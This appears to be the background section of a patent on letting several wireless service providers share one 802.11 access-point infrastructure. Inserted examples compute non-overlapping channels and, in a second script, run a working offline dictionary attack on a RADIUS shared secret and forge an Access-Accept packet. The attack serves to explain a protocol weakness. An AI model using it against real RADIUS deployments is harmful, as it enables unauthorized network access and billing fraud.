1. Field of the Invention
This invention relates generally to wireless network communications, and more specifically to a system and method enabling a network infrastructure to support multiple wireless service providers and/or customers of multiple wireless service providers. The invention also relates to a system and method enabling different access levels within a wired or wireless network system.
2. Description of the Relevant Art
Various types of wired and wireless infrastructures are being developed to service users of computing devices, such as portable computing devices (PCDs). Currently, numerous wireless service providers are attempting to install wireless network infrastructures in various locations, such as airports, hotels, office buildings, shopping malls, etc. for use by various users, such as mobile users (MUs) of PCDs.
However, when two or more providers install a wireless network infrastructure in a single location, such as an airport, the providers begin to oversubscribe the RF domain. In other words, the electromagnetic spectrum usable by these wireless networks is limited, and if two or more wireless networks are installed in the same location, this may result in inadequate RF bandwidth for use by each of these networks.
IEEE 802.11 is the IEEE standard for wireless local area networks (commonly called wireless Ethernet). IEEE 802.11 is designed to support multiple overlapping wireless LANs in a given coverage area. Each wireless LAN will typically include one or more access points (APs) which communicate wirelessly with a corresponding computing device of a user, which typically includes a wireless Ethernet transceiver. IEEE 802.11 uses a Service Set Identifier (SSID), a network name, to “select” which LAN to join and therefore which access point to associate with.
Currently, only 3 non-overlapping RF channels are available to be shared among the different wireless service providers at a location. Once these channels are occupied, little or no further bandwidth is available for other providers.
In the U.S. and most of Europe, only 3 non-overlapping channels are available using 802.11 Direct Sequence Spread Spectrum (802.11 DS) radios. In other geographies, such as France and Japan, only one channel is available using 802.11 DS. When using Frequency Hopping (FH) radios, only one “channel” is defined; the use of different “spreading codes” (hop sequences) with FH radios merely spreads the co-interference out rather than removing it. Once the available channels are used, perhaps one by each provider of a wireless infrastructure, no further bandwidth is available for other providers without the potential for harmful co-interference and the resultant reduction in available bandwidth.
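The channel counts above follow directly from the 2.4 GHz DSSS channel plan, and the following added example (not part of the patent text) works them out: it models each channel as a 22 MHz wide interval around its centre frequency and picks the largest set of mutually non-overlapping channels in a regulatory domain, which is the number of providers that can each own a clean channel. The regulatory domain channel lists are period-era assumptions made for this example, not something the page states.

```python
# 2.4 GHz 802.11 DSSS channel plan. Channels 1-13 are centred at 2407 + 5*n MHz,
# channel 14 at 2484 MHz. A DSSS transmission occupies about 22 MHz, so two
# channels interfere unless their centres are at least 22 MHz apart.
DSSS_WIDTH_MHZ = 22

# Period-era regulatory domains, assumed for this example (not taken from the page).
REGULATORY_DOMAINS = {
    "US (FCC)": range(1, 12),
    "Europe (ETSI)": range(1, 14),
    "France": range(10, 14),
    "Japan": [14],
}


def centre_mhz(channel):
    """Centre frequency of a 2.4 GHz DSSS channel in MHz."""
    if channel == 14:
        return 2484
    if 1 <= channel <= 13:
        return 2407 + 5 * channel
    raise ValueError(f"no 2.4 GHz DSSS channel {channel}")


def overlaps(a, b):
    """True when two channels' 22 MHz occupancies intersect (co-interference)."""
    return abs(centre_mhz(a) - centre_mhz(b)) < DSSS_WIDTH_MHZ


def non_overlapping_channels(allowed):
    """Largest set of mutually non-overlapping channels among those allowed.

    Each channel is the interval [centre - 11, centre + 11]. Greedy selection by
    earliest interval end is the optimal algorithm for a maximum set of disjoint
    intervals (interval scheduling), so the result is the true maximum."""
    chosen, last_end = [], None
    for ch in sorted(allowed, key=centre_mhz):
        start = centre_mhz(ch) - DSSS_WIDTH_MHZ / 2
        if last_end is None or start >= last_end:
            chosen.append(ch)
            last_end = centre_mhz(ch) + DSSS_WIDTH_MHZ / 2
    return chosen


def max_clean_providers(allowed):
    """How many WSPs can each take a channel without co-interference."""
    return len(non_overlapping_channels(allowed))


if __name__ == "__main__":
    for name, chans in REGULATORY_DOMAINS.items():
        print(f"{name}: channels {non_overlapping_channels(chans)} "
              f"-> {max_clean_providers(chans)} providers")
```

For the assumed domains this yields channels 1, 6 and 11 (three providers) in the US and most of Europe, and a single usable channel in France and Japan, matching the counts in the text; a fourth provider in any of them must share a channel and accept the resulting interference.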
Thus, due to the problems associated with multiple wireless infrastructures installed in a common area, it is desirable to provide a single wireless infrastructure which may be used by two or more wireless service providers (WSPs). This would allow a plurality of WSPs to utilize a common set of access points (APs) to provide service to a potentially overlapping set of customers or subscribers. It may also be desirable to provide a wireless infrastructure which can selectively provide different access levels to users of the system.
In the installation of a common-use wireless system, service is commonly provided to each WSP's subscribers through a common authentication/accounting system. A common authentication/accounting system involves “tying together” the authentication/accounting systems of each provider, thereby forming a “roaming consortium”. Two protocols are commonly used for this: RADIUS (Remote Authentication Dial In User Service) and TACACS+. Typically these consortiums use RADIUS as the common authentication and accounting protocol. RADIUS is a protocol defined by the IETF RADIUS Working Group for carrying information between network access devices and security/accounting servers, and is documented in RFCs 2138 and 2139. TACACS+, a similar protocol developed by Cisco Systems, is also used by some providers, although it suffers from security issues in common implementations.
The main advantage of tying the authentication/accounting systems together is the relative ease of doing so. Indeed, RADIUS was designed to support a tiered hierarchy of service providers. However, this seeming ease of implementation hides other issues which remain unsolved by this approach. Most of these center around the fact that RADIUS and TACACS+ were designed to support connectivity via a dial-up network (using either modems or ISDN). Indeed, the very acronym “RADIUS” references this dial-up heritage and focus. Since wireless LANs are not “dial-up” by their very nature, several assumptions which are “built in” to the RADIUS and TACACS+ protocols have the potential to limit the type and number of services deployed over wireless LANs.
RADIUS has its share of security issues as well. The RADIUS protocol is open to an offline dictionary attack on the “shared secret” between a network access device (the RADIUS client) and the RADIUS server: every response carries an authenticator that is an MD5 hash of the visible packet fields plus the secret, so an attacker holding one captured request/response pair can test candidate secrets at leisure. A recovered secret can be used to spoof “Access-Accept” packets, with the result of “free service” being granted to the attacker. While this attack is only possible if the attacker is able to “sniff” communications between the RADIUS server and client, wireless networks make this type of unauthorized access even more likely.
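To make the RADIUS weakness concrete, the following added example (written for this page, not code from the patent or from any RADIUS implementation) builds a constructed Access-Request/Access-Reject pair under a weak shared secret, runs the offline dictionary attack against the Response Authenticator exactly as RFC 2138 section 3 defines it, and then forges an Access-Accept that the network access device's own check would accept. The packets, user name, secret and word list are all constructed for the example; a real Request Authenticator would be 16 random bytes rather than the fixed value used here for reproducibility.

```python
import hashlib
import hmac
import struct

# RADIUS packet codes and the User-Name attribute type, per RFC 2138 sections 3 and 5.
ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT = 1, 2, 3
USER_NAME = 1


def attribute(attr_type, value):
    """One RADIUS attribute: Type, Length (including the 2-byte header), Value."""
    return struct.pack("!BB", attr_type, 2 + len(value)) + value


def build_packet(code, identifier, authenticator, attributes):
    """Code (1) | Identifier (1) | Length (2) | Authenticator (16) | Attributes."""
    return struct.pack("!BBH", code, identifier, 20 + len(attributes)) + authenticator + attributes


def response_authenticator(code, identifier, attributes, request_auth, secret):
    """RFC 2138 section 3: MD5(Code + ID + Length + RequestAuth + Attributes + Secret).

    Everything except the secret is visible on the wire, which is what makes
    an offline dictionary attack possible."""
    header = struct.pack("!BBH", code, identifier, 20 + len(attributes))
    return hashlib.md5(header + request_auth + attributes + secret).digest()


def build_response(code, request, attributes, secret):
    """Answer a request (Accept/Reject) the way a RADIUS server would."""
    identifier, request_auth = request[1], request[4:20]
    auth = response_authenticator(code, identifier, attributes, request_auth, secret)
    return build_packet(code, identifier, auth, attributes)


def verify_response(response, request, secret):
    """The check a network access device performs before trusting a response."""
    code, identifier, length = struct.unpack("!BBH", response[:4])
    expected = response_authenticator(code, identifier, response[20:length], request[4:20], secret)
    return hmac.compare_digest(expected, response[4:20])


def recover_secret(request, response, candidates):
    """Offline dictionary attack on one captured request/response pair."""
    for candidate in candidates:
        if verify_response(response, request, candidate):
            return candidate
    return None


def forge_accept(request, secret):
    """With the secret known, mint an Access-Accept the access device will validate."""
    return build_response(ACCESS_ACCEPT, request, b"", secret)


# Constructed sample exchange (not captured traffic): the access device asks
# about user "alice" and the server rejects her. Both packets are assumed to
# have been sniffed by the attacker.
SHARED_SECRET = b"testing123"          # weak secret, constructed for the example
CAPTURED_REQUEST = build_packet(ACCESS_REQUEST, 7, bytes(range(16)),
                                attribute(USER_NAME, b"alice"))
CAPTURED_REJECT = build_response(ACCESS_REJECT, CAPTURED_REQUEST, b"", SHARED_SECRET)
DICTIONARY = [b"password", b"radius", b"secret", b"testing123", b"changeme"]


def run_attack(request, response, dictionary):
    """Return (recovered secret, forged Access-Accept), or (None, None) on failure."""
    secret = recover_secret(request, response, dictionary)
    if secret is None:
        return None, None
    return secret, forge_accept(request, secret)


if __name__ == "__main__":
    secret, forged = run_attack(CAPTURED_REQUEST, CAPTURED_REJECT, DICTIONARY)
    print("recovered secret:", secret)
    print("forged Access-Accept passes the access device's check:",
          verify_response(forged, CAPTURED_REQUEST, SHARED_SECRET))
```

The attack costs one MD5 per candidate and needs no further traffic once the pair is captured, so the only effective defenses within the protocol are a high-entropy secret that no word list contains and keeping the path between access device and RADIUS server off any network an attacker can sniff, which is exactly what a shared wireless infrastructure makes hard to guarantee.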
However, the most glaring issue associated with using a common authentication/accounting system is that any approach that ties the authentication and accounting systems of a set of WSPs together does nothing to solve problems related to “ESSIDs”, described below.
As noted above, the IEEE 802.11 specification is a wireless LAN standard developed by an IEEE (Institute of Electrical and Electronics Engineers) committee in order to specify an “over the air” interface between a wireless client and a base station or Access Point, as well as among wireless clients. First conceived in 1990, the standard evolved through various Draft versions (Drafts 1 through 6), with approval of the final draft on Jun. 26, 1997.
The 802.11 MAC layer, supported by an underlying PHY layer, is concerned primarily with rules for accessing the wireless medium. Two network architectures are defined: the Infrastructure Network and the Ad Hoc Network. The Infrastructure Network is a network architecture for providing communication between wireless clients and wired network resources. The transmission of data from the wireless to the wired medium is via an Access Point (AP). The coverage area is defined by an AP and its associated wireless clients, and together all the devices form a Basic Service Set (BSS).
The IEEE 802.11 protocol also defines an ESSID (Extended Service Set ID), which is essentially a network name. The ESSID is used to select the wireless LAN infrastructure with which to associate. Two or more BSSs configured with the same ESSID and attached to a common distribution system (for instance, an Ethernet LAN) form an ESS (Extended Service Set).
With multiple access points, clients (PCDs) are free to move seamlessly between access points, as long as the ESSID matches. This feature is built into the 802.11 specification. When a client (PCD) starts losing the signal with its associated access point, it begins to search the area for a closer access point. Once a new access point is found, the client initiates an association with the new access point and a disassociation from the old one.
In public-access networks the ESSID has been commonly used to choose the WSP infrastructure with which to associate. However, this creates a problem: Each AP can only support one ESS and one associated ESSID. Thus, in order for multiple service providers to share a common space, N sets of APs are needed, where N is the number of service providers. This leads to co-interference, over-subscription of the RF environment and resultant lack of available bandwidth, as described above.
The commonly suggested solution to this problem is that all WSPs who wish to allow roaming agree on a common ESSID for their wireless networks. While initially this may appear to solve the problem, it also requires not only a common authentication system, but also a common network infrastructure which connects to the Internet and other services. The issues with a common authentication system have been outlined above. There are also numerous issues associated with using a common ESSID to support multiple WSPs in a common network infrastructure.
First, a common network infrastructure with a shared ESSID would result in insufficient network security. Since all devices, regardless of provider, would necessarily be associated with the same network infrastructure and share one link, all manner of attacks by one user against another, both active (such as Denial of Service) and passive (e.g. snooping or sniffing), would be possible.
Second, to rely on coordination of ESSIDs among a potentially large number of WSPs seems questionable at best. As new providers enter the market, each must choose to configure its APs such that roaming by other providers' subscribers is permitted. In fact, the case can be made that every WSP who chooses to participate in any roaming network would need to configure ALL of its APs to support this as yet undefined ESSID.
Even if these steps are taken, once every WSP has chosen to use the same ESSID, a new problem occurs. Unless roaming agreements are global, and every provider agrees to allow each other provider to roam on its APs, the user of any given service cannot know that his/her WSP(s) provide service in any given area. The user of such a service is left to “guess” at service availability.
Further, global coordination around a single ESSID (combined with a common authentication system) does not solve the problem. An increasing number of enterprises (large and small) are installing 802.11-compliant network infrastructures, and equipping the employees of these companies with wireless Network Interface Cards (NICs). Each of these enterprises will likely define its own ESSID, and possibly an associated WEP (Wired Equivalent Privacy) key. Further still, inexpensive 802.11-compliant APs are now available for the home market (witness the Apple Airport), and these wireless networks will likely have their own ESSIDs.
Thus, even if all WSPs select and co-ordinate on a single ESSID, enterprises (including airlines) and other users of 802.11-compliant NICs will need to reconfigure their equipment in order to use any common-ESSID network provided by these WSPs. This would likely be too inconvenient for most users.
Finally, given a common infrastructure, only one broadcast domain is possible. For an IP-based network (such as must be supplied to provide connectivity to the Internet), this implies that only one IP address space (and by extension, one Dynamic Host Configuration Protocol (DHCP) server) is possible for each location. This in turn implies that the WSP who owns the infrastructure (and supplies the connectivity) in each location has an advantage, in that its own customers will experience better connectivity than those of the other WSPs. Also implied is that any resource located on the network (such as file or video servers, voice gateways, and otherwise secured facilities of other airport tenants) is reachable by all users of the wireless infrastructure, and thus no service differentiation is possible.
Therefore, it would be desirable to provide a system and method which enables a common wireless network infrastructure (and especially an IEEE 802.11 wireless network infrastructure) to be used by two or more wireless service providers (WSPs). This would allow a plurality of service providers to utilize a common set of access points to provide service to a potentially overlapping set of customers. This would also provide subscribers or users with the ability to more fully utilize the existing network infrastructure. It would further be desirable to provide a distributed wireless network system which can selectively provide different access levels to users of the system.